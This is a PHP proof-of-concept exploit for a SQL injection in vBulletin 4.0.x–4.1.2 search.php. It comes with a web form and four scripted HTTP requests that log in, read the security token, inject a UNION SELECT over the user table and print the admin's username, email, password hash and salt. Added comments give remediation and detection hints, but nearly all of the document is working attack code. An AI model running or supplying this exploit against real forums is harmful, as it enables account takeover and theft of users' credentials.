<?
/*
vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability
888 888 888
888 888 888
888 888 888
.d8888b .d88b. .d88888 .d88b. .d88888 88888b. 888 888
d88P" d88""88b d88" 888 d8P Y8b d88" 888 888 "88b 888 888
888 888 888 888 888 88888888 888 888 888 888 888 888
Y88b. Y88..88P Y88b 888 Y8b. Y88b 888 888 d88P Y88b 888
"Y8888P "Y88P" "Y88888 "Y8888 "Y88888 88888P" "Y88888
888
Y8b d88P
"Y88P"
8888888b. d8888 888888b. .d8888b. .d88888b. 888 888 888b 888
888 Y88b d88888 888 "88b d88P Y88b d88P" "Y88b 888 888 8888b 888
888 888 d88P888 888 .88P .d88P 888 888 888 888 88888b 888
888 d88P d88P 888 8888888K. 8888" 888 888 888 888 888Y88b 888
8888888P" d88P 888 888 "Y88b "Y8b. 888 888 888 888 888 Y88b888
888 T88b d88P 888 888 888 888 888 888 888 888 888 888 Y88888
888 T88b d8888888888 888 d88P Y88b d88P Y88b. .d88P Y88b. .d88P 888 Y8888
888 T88b d88P 888 8888888P" "Y8888P" "Y88888P" "Y88888P" 888 Y888
mail : v.b-4@hotmail.com
*/
?>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1256" />
<center>
<h1>vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability</h1>
<form method='post' action=''>
<table border='1'>
<tr><td>Forum Url</td><td> <input type='text' size='100' name='url' value=''></td></tr>
<tr><td>User name</td><td> <input type='text' size='100' name='username' value=''></td></tr>
<tr><td>Password </td><td><input type='text' size='100' name='password' value='' ></td></tr>
<tr><td>Admin ID </td><td><input type='text' size='100' name='admin_id' value=''></td></tr>
<tr><td>Valid Group Search Word</td><td><input type='text' size='100' name='query'value='romnce'></td></tr>
</table>
<input type="hidden" name="form_action" value="1">
<input type='submit' value='Get'>
</form>
</center>
<?
// Proof-of-concept driver for the search.php SQL injection named in the file header
// (vBulletin 4.0.x => 4.1.2). It runs only when the form above is posted with form_action=1
// and issues four HTTP requests in order: log in, fetch search.php to read the security token,
// POST the search with the injected fragment, then fetch the redirect target and parse it.
// NOTE(review): $_POST['form_action'] is read without isset(), so a plain GET of this page
// raises an undefined-index notice before the comparison.
if($_POST['form_action'] == 1 )
{
$query=$_POST["query"];
$url=$_POST["url"];
$admin_id=$_POST["admin_id"];
// Injected fragment. It is appended after "searchthreadid=" in the search POST further down, so
// the leading "&" starts a separate cat[0] form field. Its value closes a parenthesis and adds a
// UNION SELECT over the user table, joining username, email, password and salt with ':' (0x3a);
// the trailing '#' comments out whatever SQL follows. $admin_id is concatenated verbatim.
// Defender's view: presumably the server concatenates cat[] values into SQL without an integer
// cast (confirm against the vendor patch). The remediation is to coerce category ids to integers
// or bind them as parameters. For detection, a search.php POST whose cat[...] field is not
// purely numeric is the indicator to look for in request-body logging or a WAF.
$sql="&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=".$admin_id."#";
$user=$_POST["username"];
$pass=$_POST["password"];
// The login form field vb_login_md5password carries an unsalted MD5 of the password, computed here.
$md5Pass = md5($pass);
$data = "do=login&url=%2Findex.php&vb_login_md5password=$md5Pass&vb_login_username=$user&cookieuser=1";
// Request 1: log in. The flaw is reached from an authenticated session, so a valid account on the
// forum is a precondition for what this script does.
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, $url."/login.php?do=login"); // replace ** with tt
// Every request in this script sends the same fixed, dated User-Agent string. On its own it is a
// weak indicator, but it helps correlate the login -> search.php -> search.php POST sequence in logs.
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt ($ch, CURLOPT_TIMEOUT, '10');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_POSTFIELDS,$data);
// Session cookies are written to and read from vb.txt, a relative path resolved against the
// current working directory, and reused by every later request.
// NOTE(review): if this runs under a web root, that cookie file may be retrievable by others - confirm.
curl_setopt($ch, CURLOPT_COOKIEJAR, "vb.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "vb.txt");
// curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
//curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8118");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
// The login response is stored but never inspected; a failed login is not detected here.
$store = curl_exec ($ch);
curl_close($ch);
// Request 2: fetch search.php with the session cookies, to read the per-session token from the page.
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, $url."/search.php"); // replace ** with tt
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_COOKIEJAR, "vb.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "vb.txt");
//curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
//curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8118");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
$store = curl_exec ($ch);
curl_close($ch);
// SECURITYTOKEN is cut out of the page's inline JavaScript. It looks like an anti-CSRF token
// (TODO confirm); it ties the POST to the session and does not validate field contents, so it
// is no barrier to a logged-in client.
$sec=myf($store,'var SECURITYTOKEN = "','";');
// Request 3: submit the search form. CURLOPT_HEADER is enabled so that the response headers,
// including the Location redirect, end up in $store.
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, $url."/search.php");
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt ($ch, CURLOPT_TIMEOUT, '10');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
// Body of the search POST: the normal search fields, the token read above, and $sql appended last.
curl_setopt($ch,CURLOPT_POSTFIELDS,"type%5B%5D=7&query=".$query."&titleonly=1&searchuser=&exactname=1&tag=&dosearch=Search+Now&searchdate=0&beforeafter=after&sortby=relevance&order=descending&saveprefs=1&s=&securitytoken=".$sec."&do=process&searchthreadid=".$sql);
curl_setopt($ch, CURLOPT_COOKIEJAR, "vb.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "vb.txt");
//curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8118");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
$store = curl_exec ($ch);
curl_close($ch);
// The redirect target is cut from the raw headers between "Location:" and "Content-Length:".
// This depends on those two headers appearing adjacent and in that order.
// NOTE(review): $url2 is chosen by the remote server and is fetched below without checking
// that it stays on the host given in $url.
$url2= trim(myf($store,"Location:","Content-Length:"));
// Request 4: fetch the search-results page that the redirect points to.
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL,$url2);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_COOKIEJAR, "vb.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "vb.txt");
//curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
//curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8118");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
$store = curl_exec ($ch);
curl_close($ch);
echo("<table border='1'>");
// The text of the first <p class="description"> element is split on ':'. Indexes 3..6 are assumed
// to hold username, email, password hash and salt; a shorter list raises undefined-offset notices.
// This shows where injected rows surface in the page: in the search-results description text.
$list=explode(":", myf($store,'<p class="description">','</p>'));
// NOTE(review): the values below come from the remote response and are written into value='...'
// attributes without htmlspecialchars(), so any markup in that response is rendered by this page.
// The opening <table> is also never closed.
echo("<tr><td>User Name</td><td><input size='100' type='text' value='".str_replace("Uncategorized,","",$list['3'])."'></td></tr>");
echo("<tr><td>Mail</td><td><input size='100' type='text' value='".$list['4']."'></td></tr>");
echo("<tr><td>MD5</td><td><input size='100' type='text' value='".$list['5']."'></td></tr>");
echo("<tr><td>Salt</td><td><input size='100' type='text' value='".$list['6']."'></td></tr>");
//print_r($list);
}
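/**
 * Return the trimmed text that sits between two marker strings.
 *
 * The text is split on every occurrence of the start marker and only the
 * second piece is kept, i.e. what follows the first start marker up to the
 * next start marker or the end of the text. That piece is then cut at the
 * first end marker.
 *
 * @param string $text               Text to search.
 * @param string $marqueurDebutLien  Start marker; the result begins right after it.
 * @param string $marqueurFinLien    End marker; the result stops right before it.
 * @return string Trimmed text between the markers, or '' when the start marker is absent.
 */
function myf($text,$marqueurDebutLien,$marqueurFinLien)
{
    $afterStart = explode($marqueurDebutLien, $text);
    // Without this guard a missing start marker reads an undefined offset and hands
    // null to explode(); the result was '' either way, so return it explicitly.
    if (!isset($afterStart[1])) {
        return '';
    }
    $beforeEnd = explode($marqueurFinLien, $afterStart[1]);
    return trim($beforeEnd[0]);
}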
?>